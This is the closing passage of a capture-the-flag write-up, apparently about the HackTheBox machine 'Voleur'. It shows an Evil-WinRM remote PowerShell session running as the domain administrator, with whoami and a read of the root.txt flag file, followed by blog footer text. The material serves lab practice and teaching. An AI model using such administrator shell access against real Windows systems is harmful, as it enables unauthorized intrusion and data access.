Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
voleur\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
414555fd7619ecd56b6ab3a15d7d9167
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Share on
Dany Sucuc
WRITTEN BY
sckull

Read other posts

HackTheBox - Voleur